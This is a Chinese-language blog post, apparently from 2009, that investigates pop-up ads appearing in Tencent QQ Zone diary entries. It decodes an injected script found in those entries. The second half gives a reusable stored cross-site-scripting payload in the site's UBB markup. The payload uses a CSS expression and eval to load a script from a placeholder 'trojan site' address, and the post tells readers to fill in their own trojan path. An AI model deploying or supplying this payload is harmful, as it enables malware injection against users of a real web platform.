前几天出现访问空间弹出广告

开始没怎么注意

后来经一位朋友说 看我一篇日志经常出现广告。加上自己的经历。 看了下源代码 发现有个共同处 一律有 http://catche.qq.com/temp/20081209/4236888.swf 这个FLASH地址（访问不了） 而重要的在后面那段标记蓝色代码 经过简单的unicode加密 解码后为

程序代码

this.parentNode.style.display='none';if(!window.xxr){var l=document.createElement('script');l.src='/Article/UploadFiles/200904/20090427085738134.jpg';l.type='text/javascript';document.getElementsByTagName('head').item(0).appendChild(l);window.xxr=1}

就是不知道到底是腾讯的问题 还是病毒自动提交的跨站代码 而腾讯空间有跨站漏洞是毋庸置疑的。 利用方式 由于我的日志已经编辑掉 无法研究。。

把/Article/UploadFiles/200904/20090427085850530.jpg下载过来用记事本打开 就可以发现恶意代码

空间日志特征是一个大小都为0的 FLASH 地址为 http://catche.qq.com/temp/20081209/4236888.swf

只要重新编辑下 删掉FLASH 即可（不是转帖复制 手动打上去的文章也有此情况）

又访问了几位好友空间 以前发布的日志没这种情况 基本发生在最近3-4天前发布的日志 病毒代码不是每人都有

由于个人水平有限 无法确定究竟是腾讯空间出的问题还是 大量网民感染木马自动提交的一段代码

以下代码仅供测试 切勿用作非法用途

程序代码

[flash,0,0]http://随意地址/fxcs.swf[email=]id=baidu style=ee:e­xpression(eval(unescape('this.parentNode.style.display%3D%27none%27%3Bif%28%21window.xxr%29%7Bvar%20l%3Ddocument.createElement%28%27script%27%29%3Bl.src%3D%27http%3A//木马网站地址/a/q/mq.jpg%27%3Bl.type%3D%27text/javascript%27%3Bdocument.getElementsByTagName%28%27head%27%29.item%280%29.appendChild%28l%29%3Bwindow.xxr%3D1%7D')));display:none;@qq.com[/email][/flash]

开头的FLASH 随便填 木马网站地址/a/q/mq.jpg 修正为木马路径。

搜索引擎查询

http://www.baidu.com/s?tn=index88_pg&ct=0&ie=gb2312&bs=site%3A4236888.swf&sr=&z=&cl=3&f=8&wd=site%3Aqq.com+4236888.swf

http://www.baidu.com/s?tn=360se_dg&ie=gb2312&bs=site%3Aqq.com+4236888.swf&sr=&z=&cl=3&f=8&wd=4236888.swf&ct=0

http://www.google.cn/search?hl=zh-CN&q=4236888.swf&meta=&aq=f&oq=

由于查找不了源文件 搜索结果小的可怜 无法扩大搜索